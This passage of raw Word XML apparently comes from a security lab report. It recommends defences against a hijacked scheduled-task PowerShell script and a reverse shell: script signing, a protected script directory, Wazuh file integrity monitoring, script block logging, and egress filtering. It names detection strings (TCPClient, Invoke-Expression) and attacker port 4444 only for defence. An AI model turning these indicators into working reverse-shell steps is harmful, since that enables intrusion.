      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>3. PowerShell Code Signing Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0051731C" w:rsidR="0051731C" w:rsidP="0093205D" w:rsidRDefault="0051731C" w14:paraId="1CDE79AE" w14:textId="7693395B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Set the PowerShell Execution Policy to "AllSigned".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0051731C" w:rsidR="0051731C" w:rsidP="0093205D" w:rsidRDefault="0051731C" w14:paraId="1DEEB7A5" w14:textId="090C3CB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This requires every script on the system to have a digital signature from a trusted internal authority.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0051731C" w:rsidR="0051731C" w:rsidP="0093205D" w:rsidRDefault="0051731C" w14:paraId="6A07E797" w14:textId="358103AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Since an attacker cannot recreate a valid digital signature, the hijacked cleanup.ps1 would be blocked from executing because its "signature" would be broken or missing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051731C" w:rsidP="0051731C" w:rsidRDefault="0051731C" w14:paraId="73DDC163" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="006E7C0C" w:rsidR="006E7C0C" w:rsidP="006E7C0C" w:rsidRDefault="006E7C0C" w14:paraId="48E6F22A" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>4. Centralized Directory for Privileged Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="006E7C0C" w:rsidR="006E7C0C" w:rsidP="0093205D" w:rsidRDefault="006E7C0C" w14:paraId="5EE501FC" w14:textId="0FD2BF64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Move all administrative scripts to a central, protected directory (e.g., C:\Program Files\AdminTools\).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="006E7C0C" w:rsidR="006E7C0C" w:rsidP="0093205D" w:rsidRDefault="006E7C0C" w14:paraId="1289FA64" w14:textId="23051A60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Apply a "Strict Baseline" to this folder where only the Domain Admins group has write access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E7C0C" w:rsidP="0093205D" w:rsidRDefault="006E7C0C" w14:paraId="525779A3" w14:textId="15D18D73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Prevents the accidental creation of "writable" scripts in random locations like C:\TaskScripts\.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A864D0" w:rsidP="00A864D0" w:rsidRDefault="00A864D0" w14:paraId="72A3189F" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A864D0" w:rsidR="00A864D0" w:rsidP="00A864D0" w:rsidRDefault="00A864D0" w14:paraId="1AF944CB" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>5. Proactive Control: File Integrity Monitoring (FIM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A864D0" w:rsidR="00A864D0" w:rsidP="002E72EC" w:rsidRDefault="00A864D0" w14:paraId="67D0CF66" w14:textId="34678EE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Deploy FIM to track changes in sensitive directories like C:\TaskScripts\.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A864D0" w:rsidR="00A864D0" w:rsidP="002E72EC" w:rsidRDefault="00A864D0" w14:paraId="50B169F9" w14:textId="03E1C66E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Configure tools (e.g., Wazuh) to trigger high-severity alerts for any "Write" or "Modify" events on script files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A864D0" w:rsidR="00A864D0" w:rsidP="002E72EC" w:rsidRDefault="00A864D0" w14:paraId="413B6134" w14:textId="07861845">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>To catch the attacker during the "Hijack" phase, allowing security teams to intervene before the malicious script is actually executed by the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F45111" w:rsidP="00F45111" w:rsidRDefault="00F45111" w14:paraId="684F3270" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="00F45111" w:rsidRDefault="00C05C82" w14:paraId="50E54E56" w14:textId="6F43C79E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>6. Enhanced PowerShell Logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="002E72EC" w:rsidRDefault="00F45111" w14:paraId="07FB06F2" w14:textId="22AD4B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Ensure Script Block Logging (Event ID 4104) is enabled across the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="002E72EC" w:rsidRDefault="00F45111" w14:paraId="44463340" w14:textId="6D2ED2FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Use Group Policy (GPO) to enable detailed logging for all PowerShell activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="002E72EC" w:rsidRDefault="00F45111" w14:paraId="54290713" w14:textId="38612414">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>To provide the specific telemetry needed to catch malicious strings, such as TCPClient or Invoke-Expression, as seen in your Wazuh alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="00F45111" w:rsidRDefault="00F45111" w14:paraId="5407A856" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="00F45111" w:rsidRDefault="00C05C82" w14:paraId="4501422A" w14:textId="451C6229">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>7. Network-Level Egress Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="002E72EC" w:rsidRDefault="00F45111" w14:paraId="5C540C10" w14:textId="5D2C46AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Configure host or perimeter firewalls to block outbound traffic on non-standard ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="002E72EC" w:rsidRDefault="00F45111" w14:paraId="1F5FB49B" w14:textId="21693BEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Restrict server communication to only necessary ports and known-good IP addresses, specifically blocking common "hacker" ports like 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F45111" w:rsidR="00F45111" w:rsidP="002E72EC" w:rsidRDefault="00F45111" w14:paraId="35A05C46" w14:textId="01B1E9F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>To prevent a successful "callback" to an attacker's machine, effectively breaking the reverse shell even if the script executes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED1773" w:rsidR="00F45111" w:rsidP="00F45111" w:rsidRDefault="00F45111" w14:paraId="0AC93D86" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00327ECF" w:rsidP="00500AD9" w:rsidRDefault="00327ECF" w14:paraId="1B8C1C44" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="1032A301" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="01A42945" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896692" w:id="36"/>
      <w:commentRangeStart w:id="37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:commentRangeEnd w:id="37"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="37"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3823"/>
        <w:gridCol w:w="5359"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00500AD9" w:rsidTr="001B4A08" w14:paraId="33ECB567" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="11CFEF9F" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Description of Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="00500AD9" w14:paraId="71285909" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00500AD9" w:rsidTr="001B4A08" w14:paraId="640C5BAA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="0028278F" w14:paraId="1AF80DB5" w14:textId="471DD364">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK: Scheduled Task (T1053.005)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="003971D5" w14:paraId="088C9FEE" w14:textId="71CD4703">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:history="1" r:id="rId49">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1053/005/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="003971D5" w:rsidP="001B4A08" w:rsidRDefault="003971D5" w14:paraId="393291B3" w14:textId="61F05129">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00500AD9" w:rsidTr="001B4A08" w14:paraId="39C1F1CE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00500AD9" w:rsidP="001B4A08" w:rsidRDefault="004544E0" w14:paraId="49256837" w14:textId="2BC6BA3F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Wazuh: Log Data Collection and Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00350A6F" w:rsidP="001B4A08" w:rsidRDefault="00350A6F" w14:paraId="3B1BEF8E" w14:textId="6D09E24D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:history="1" r:id="rId50">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://documentation.wazuh.com/current/user-manual/capabilities/log-data-collection/how-it-works.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00350A6F" w:rsidTr="001B4A08" w14:paraId="0C8BD997" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="004544E0" w:rsidR="00350A6F" w:rsidP="001B4A08" w:rsidRDefault="00072416" w14:paraId="29C82918" w14:textId="6CCF02B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Qualys: Defending Against Scheduled Task Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00956CE0" w:rsidP="001B4A08" w:rsidRDefault="00956CE0" w14:paraId="7EDD5827" w14:textId="6BAF0556">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:history="1" r:id="rId51">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="006C4892" w:rsidTr="001B4A08" w14:paraId="682C84EF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00072416" w:rsidR="006C4892" w:rsidP="001B4A08" w:rsidRDefault="006C4892" w14:paraId="7380298D" w14:textId="1E99F7C7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Microsoft: File Access Control Lists (ACLs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000E568D" w:rsidP="001B4A08" w:rsidRDefault="000E568D" w14:paraId="16C6EADB" w14:textId="63B6F85A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:history="1" r:id="rId52">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-lists</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="000E568D" w:rsidTr="001B4A08" w14:paraId="2AC111FD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="006C4892" w:rsidR="000E568D" w:rsidP="001B4A08" w:rsidRDefault="000E568D" w14:paraId="00E5A79C" w14:textId="0E0C6772">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Artifical Intelligence (AI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00E03AF5" w:rsidR="000E568D" w:rsidP="002E72EC" w:rsidRDefault="00E03AF5" w14:paraId="659AD741" w14:textId="62010B99">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
